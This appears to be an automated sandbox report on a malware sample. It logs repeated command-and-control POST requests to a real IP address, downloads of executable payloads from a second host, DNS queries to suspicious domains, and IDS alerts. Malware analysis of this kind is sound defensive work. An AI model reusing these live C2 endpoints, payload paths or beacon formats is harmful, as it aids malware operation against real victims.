Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 98.85.100.80 98.85.100.80

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49712 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49715 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49723 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49722 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49726 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49728 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49730 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49732 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50097 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50106 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50103 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50112 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50108 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50110 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50099 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50114 -> 104.21.64.80:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009DE0C0 recv,recv,recv,recv,

0_2_009DE0C0

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /WEIsmPfDcpBFJozngnYN1734366322?argument=JSFdsYpNAyKuuMJE1734525529 HTTP/1.1Host: home.twentytk20pn.topAccept: /
Source: global traffic	HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 18 Dec 2024 12:17:47 GMTIf-None-Match: "6762bd6b-1da600"
Source: global traffic	HTTP traffic detected: GET /files/dodo/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Tue, 17 Dec 2024 09:46:16 GMTIf-None-Match: "67614868-bae80"

Source: global traffic	DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic	DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic	DNS traffic detected: DNS query: pancakedipyps.click
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.twentytk20pn.top
Source: global traffic	DNS traffic detected: DNS query: twentytk20pn.top
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat

Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: bc8eaffed4.exe, 00000014.00000003.1967470791.0000000006FEF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 3a1a782de7.exe, 0000000C.00000002.1807838541.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 44cc35716d.exe, 0000000F.00000002.1868427762.000000000109B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 3a1a782de7.exe, 0000000E.00000003.2031357954.00000000036AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
